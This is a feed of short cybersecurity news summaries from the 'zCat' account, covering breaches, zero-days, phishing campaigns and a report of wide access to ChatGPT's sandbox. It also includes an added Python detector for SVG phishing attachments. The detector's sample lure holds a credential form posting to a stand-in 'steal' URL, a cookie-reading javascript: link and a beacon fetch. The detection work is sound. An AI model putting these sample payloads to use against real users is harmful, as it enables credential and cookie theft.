zCat
npub1zm7j...pnd6
zCat - Android App about Zcash, privacy and cybersecurity news aggregator
zCat 1 year ago
Swiss Cyber Agency Warns of QR Code Malware in Mail Scam

A new malware campaign targeting Swiss residents through fake postal letters has been uncovered by the country’s National Cyber Security Centre (NCSC). The scam involves fraudulent correspondence disguised as official communication from MeteoSwiss, the Federal Office of Meteorology and Climatology, urging recipients to scan a QR code and download a malicious weather app for Android devices. The fake app, called “Severe Weather Warning App,” mimics the legitimate Alertswiss app but is labeled “AlertSwiss” with a slightly altered logo. Unlike the authentic app, which is available on the Google Play Store, the fraudulent version is hosted on an unverified third-party website. Once installed, the app deploys a Coper Trojan variant to steal sensitive data, including banking credentials, and intercepts two-factor authentication (2FA) codes.

See more: #cybersecurity #malware
zCat 1 year ago
Ransomware Attack on Oklahoma Medical Center Impacts 133,000

Great Plains Regional Medical Center in Oklahoma is notifying over 133,000 individuals that their personal information was compromised in a ransomware attack. The public, not-for-profit healthcare system discovered the attack on September 8, 2024, when ransomware was deployed, but the attackers had access to its systems for at least three days prior. According to the medical center, the attackers accessed and encrypted certain files between September 5 and September 8, and exfiltrated information from its systems.

See more: #cybersecurity #databreach
zCat 1 year ago
AnnieMac Data Breach Impacts 171,000 People

New Jersey-based mortgage loan provider AnnieMac Home Mortgage (American Neighborhood Mortgage Acceptance Company) is informing many individuals of a recent data breach. In notification letters to impacted individuals, AnnieMac revealed that it detected suspicious activity on some systems on August 23, 2024. An investigation showed that hackers had access to its systems between August 21 and August 23, and they viewed and/or copied files containing personal information. The compromised information includes names and Social Security numbers.

See more: #cybersecurity #databreach
zCat 1 year ago
Gmail's New Shielded Email Feature Lets Users Create Aliases for Email Privacy

Google appears to be readying a new feature called Shielded Email that allows users to create email aliases when signing up for online services and better combat spam. The feature was first reported by Android Authority last week following a teardown of the latest version of Google Play Services for Android. The idea is to create unique, single-use email addresses that forward the messages to the associated primary account, thereby preventing the need for providing the real email address when filling out forms or registering for new services online.

See more: #cybersecurity #privacy #gmail
zCat 1 year ago
Palo Alto Networks patches two firewall zero-days used in attacks

Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). The first flaw, tracked as CVE-2024-0012, is an authentication bypass found in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges without requiring authentication or user interaction. The second one (CVE-2024-9474) is a PAN-OS privilege escalation security flaw that allows malicious PAN-OS administrators to perform actions on the firewall with root privileges. While CVE-2024-9474 was disclosed today, the company first warned customers on November 8 to restrict access to their next-generation firewalls because of a potential RCE flaw tagged last Friday as CVE-2024-0012.

See more: Bleeping Computer, Security Week
zCat 1 year ago
Fake Discount Sites Exploit Black Friday to Hijack Shopper Information

A new phishing campaign is targeting e-commerce shoppers in Europe and the United States with bogus pages that mimic legitimate brands with the goal of stealing their personal information ahead of the Black Friday shopping season. "The campaign leveraged the heightened online shopping activity in November, the peak season for Black Friday discounts. The threat actor used fake discounted products as phishing lures to deceive victims into providing their Cardholder Data (CHD) and Sensitive Authentication Data (SAD) and Personally Identifiable Information (PII)," EclecticIQ said. The activity, first observed in early October 2024, has been attributed with high confidence to a Chinese financially motivated threat actor codenamed SilkSpecter. Some of the impersonated brands include IKEA, L.L.Bean, North Face, and Wayfair.

See more: #cybersecurity #phishing
zCat 1 year ago
Phishing emails increasingly use SVG attachments to evade detection

Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code.

See more: #cybersecurity #phishing #svg
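Because an SVG is XML text rather than pixels, a mail gateway can triage it statically. The script below is an added example, not code from zCat's post or the article it summarizes. It flags the constructs that let an "image" carry a phishing form or a loader: `<script>`, `on*` event handlers, `<foreignObject>` (which can wrap arbitrary HTML such as a login form), `javascript:` or `data:text/html` hrefs, and remote hrefs. The two sample documents and the `example.invalid` hostnames are constructed for this example; the list of flagged constructs is this example's own choice, not a published detection rule.

```python
"""Static triage of SVG e-mail attachments for active content (added example)."""
import re
import xml.etree.ElementTree as ET

# Element names (lower-cased, namespace stripped) that carry code or embedded HTML.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}


def _local(name: str) -> str:
    """Strip the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(svg_text: str) -> list[str]:
    """Return a list of findings for one SVG document; an empty list means nothing was flagged."""
    findings: list[str] = []

    # An image never needs a DTD, and a DOCTYPE enables entity-expansion tricks
    # (billion laughs, external entities), so refuse to parse such a file at all.
    if re.search(r"<!DOCTYPE", svg_text, re.IGNORECASE):
        return ["doctype: DTD present, refusing to parse"]

    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"parse-error: {exc}"]

    for el in root.iter():
        tag = _local(el.tag) if isinstance(el.tag, str) else ""
        if tag in ACTIVE_TAGS:
            findings.append(f"element: <{tag}>")
        for attr, value in el.attrib.items():
            lname = _local(attr)          # handles xlink:href as well as plain href
            v = value.strip()
            if lname.startswith("on"):    # onload=, onclick=, onerror=, ...
                findings.append(f"handler: {lname} on <{tag}>")
            if lname == "href":
                if re.match(r"javascript:", v, re.IGNORECASE):
                    findings.append(f"javascript-url: href on <{tag}>")
                elif re.match(r"data:text/html", v, re.IGNORECASE):
                    findings.append(f"data-html-url: href on <{tag}>")
                elif re.match(r"(https?:)?//", v, re.IGNORECASE):
                    findings.append(f"remote-href: {v} on <{tag}>")
            if lname == "style" and "url(" in v.lower():   # CSS can also fetch remote resources
                findings.append(f"css-url: style on <{tag}>")
    return findings


# Constructed samples: a plain logo, and an "attachment" that opens a credential form.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="40">
  <rect width="100" height="40" fill="#0a0"/>
  <text x="10" y="25" font-size="14">Invoice</text>
</svg>"""

MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="window.location='https://example.invalid/login'">
  <foreignObject width="400" height="300">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/steal" method="post">
      <input name="password" type="password"/>
    </form>
  </foreignObject>
  <a xlink:href="javascript:alert(document.cookie)"><text y="20">Open document</text></a>
  <image xlink:href="https://example.invalid/lure.png" width="10" height="10"/>
  <script>fetch("https://example.invalid/beacon")</script>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, scan_svg(doc))
```

Run as a script it prints an empty list for the logo and five findings for the lure. In a gateway you would apply it to every `image/svg+xml` part (and to SVG hidden inside archives), and treat any finding as grounds to quarantine rather than render the attachment, since a mail client or browser that opens the file will execute exactly the content flagged here.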
zCat 1 year ago
T-Mobile confirms it was hacked in recent wave of telecom breaches

T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Wall Street Journal, which first reported about the breach. T-Mobile shared a similar statement with BleepingComputer, stating it has found no evidence of any customer data being accessed or exfiltrated.

See more: Bleeping Computer, Security Week #cybersecurity #hack
zCat 1 year ago
GitHub projects targeted with malicious commits to frame researcher

GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions.

#cybersecurity #backdoors #malware
zCat 1 year ago
Sentry just gave $750k to open source projects

"Sentry started out as an Open Source side project in 2008. Today we are a Fair Source company with 100,000+ organizations on our SaaS and $100M+ ARR, but we have not forgotten our roots nor the hundreds of Open Source maintainers whose work we depend on for our success. Every year we share our success with the community, and 2024 is no different. This year, our budget is $750,000, up 50% from last year. The big news this year is that, together with dozens of other companies, we launched the Open Source Pledge. It’s great that Sentry pays maintainers, but we can’t solve the Open Source sustainability crisis by ourselves. The good news is that we’re not alone. Through the Pledge, many other companies are also stepping up to the plate, paying maintainers at least $2,000 per year per dev on staff and blogging about it annually to drive awareness and accountability."

See more: #opensource
zCat 1 year ago
Botnet exploits GeoVision zero-day to install Mirai malware

A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. The flaw is tracked as CVE-2024-11120 and was discovered by Piotr Kijewski of The Shadowserver Foundation. It is a critical severity (CVSS v3.1 score: 9.8) OS command injection problem, allowing unauthenticated attackers to execute arbitrary system commands on the device. "Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device," warns Taiwan's CERT. "Moreover, this vulnerability has already been exploited by attackers, and we have received related reports."

See more: #cybersecurity #malware #zeroday
zCat 1 year ago
These 8 Apps on Google Play Store Contain Android/FakeApp Trojan

Russian cybersecurity firm Dr. Web has exposed several Android apps on the Google Play Store that contain a sophisticated trojan, Android[.]FakeApp[.]1669 (also known as Android/FakeApp). These apps, which claim to provide practical functions like financial tools, planners, and recipe books, contain a hidden payload that redirects users to unwanted websites, compromising their data. What’s worse, more than 2 million users have downloaded these infected apps from Google Play, unaware of the threat. Malware on the official Google Play Store is nothing new. In fact, reports from last month indicate a rise in malicious apps on both the Apple App Store and Google Play Store.

See more: #cybersecurity #android #malware
zCat 1 year ago
Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations

Cybersecurity researchers have shed light on a new remote access trojan and information stealer used by Iranian state-sponsored actors to conduct reconnaissance of compromised endpoints and execute malicious commands. Cybersecurity company Check Point has codenamed the malware WezRat, stating it has been detected in the wild since at least September 1, 2023, based on artifacts uploaded to the VirusTotal platform. "WezRat can execute commands, take screenshots, upload files, perform keylogging, and steal clipboard content and cookie files," it said in a technical report. "Some functions are performed by separate modules retrieved from the command and control (C&C) server in the form of DLL files, making the backdoor's main component less suspicious." WezRat is assessed to be the work of Cotton Sandstorm, an Iranian hacking group that's better known under the cover names Emennet Pasargad and, more recently, Aria Sepehr Ayandehsazan (ASA).

See more: #cybersecurity #malware #trojan
zCat 1 year ago
NSO Group used another WhatsApp zero-day after being sued, court docs say

Israeli surveillance firm NSO Group reportedly used multiple zero-day exploits, including an unknown one named "Erised," that leveraged WhatsApp vulnerabilities to deploy Pegasus spyware in zero-click attacks, even after getting sued. Pegasus is NSO Group's spyware platform (marketed as surveillance software for governments worldwide), with multiple software components that provide customers with extensive surveillance capabilities over victims' compromised devices. For instance, NSO customers could monitor the victims' activity and extract information using the Pegasus agent installed on the victims' mobile phones.

See more: #cybersecurity #spyware #privacy
zCat 1 year ago
Researchers Warn of Privilege Escalation Risks in Google's Vertex AI ML Platform

Cybersecurity researchers have disclosed two security flaws in Google's Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud. "By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project," Palo Alto Networks Unit 42 researchers Ofir Balassiano and Ofir Shaty said in an analysis published earlier this week. "Deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a serious proprietary and sensitive data exfiltration attack risk." Vertex AI is Google's ML platform for training and deploying custom ML models and artificial intelligence (AI) applications at scale. It was first introduced in May 2021.

See more: #cybersecurity #vertexai
zCat 1 year ago
Fraud network uses 4,700 fake shopping sites to steal credit cards

A financially motivated Chinese threat actor dubbed "SilkSpecter" is using thousands of fake online stores to steal the payment card details of online shoppers in the U.S. and Europe. The fraud campaign started in October 2024, offering steep discounts for the upcoming Black Friday shopping period that usually sees elevated shopping activity. EclecticIQ threat researcher Arda Buyukkaya, who discovered the campaign, told BleepingComputer that, as of the publishing of their report, SilkSpecter operates 4,695 fraudulent domains. These sites impersonate well-known brands such as the North Face, Lidl, Bath & Body Works, L.L. Bean, Wayfair, Makita, IKEA, and Gardena.

See more: #cybersecurity #phishing
zCat 1 year ago
watchTowr Finds New Zero-Day Vulnerability in Fortinet Products

Attack surface management provider watchTowr claims to have found a new zero-day vulnerability in cybersecurity provider Fortinet’s products. This flaw would allow a managed FortiGate device to elevate privileges and seize control of the FortiManager instance. This vulnerability, which carries a common vulnerability severity score (CVSS) of 9.8, is actively exploited in the wild, sometimes together with CVE-2024-23113. It allows threat actors to use a compromised FortiManager device to execute arbitrary code or commands against other FortiManager devices.

See more: #cybersecurity #fortinet
zCat 1 year ago
ChatGPT allows access to underlying sandbox OS, “playbook” data

OpenAI's ChatGPT platform provides a great degree of access to the LLM's sandbox, allowing you to upload programs and files, execute commands, and browse the sandbox's file structure. The ChatGPT sandbox is an isolated environment that allows users to interact with it securely while being walled off from other users and the host servers. It does this by restricting access to sensitive files and folders, blocking access to the internet, and attempting to restrict commands that can be used to exploit flaws or potentially break out of the sandbox. Marco Figueroa of Mozilla's 0-day investigative network, 0DIN, discovered that it's possible to get extensive access to the sandbox, including the ability to upload and execute Python scripts and download the LLM's playbook.

See more: #cybersecurity #chatgpt
zCat 1 year ago
Critical Plugin Flaw Exposed 4 Million WordPress Websites to Takeover

A critical-severity vulnerability in the Really Simple Security plugin for WordPress potentially exposed four million websites to complete takeover, WordPress security firm Defiant warns. Tracked as CVE-2024-10924 (CVSS score of 9.8), the issue is described as an authentication bypass that allows an unauthenticated attacker to log in as any user, including an administrator. According to Defiant, the security defect exists because of an improper user check error handling in the plugin’s two-factor REST API action. Specifically, the bug is triggered if two-factor authentication (2FA) is enabled.

See more: #cybersecurity #wordpress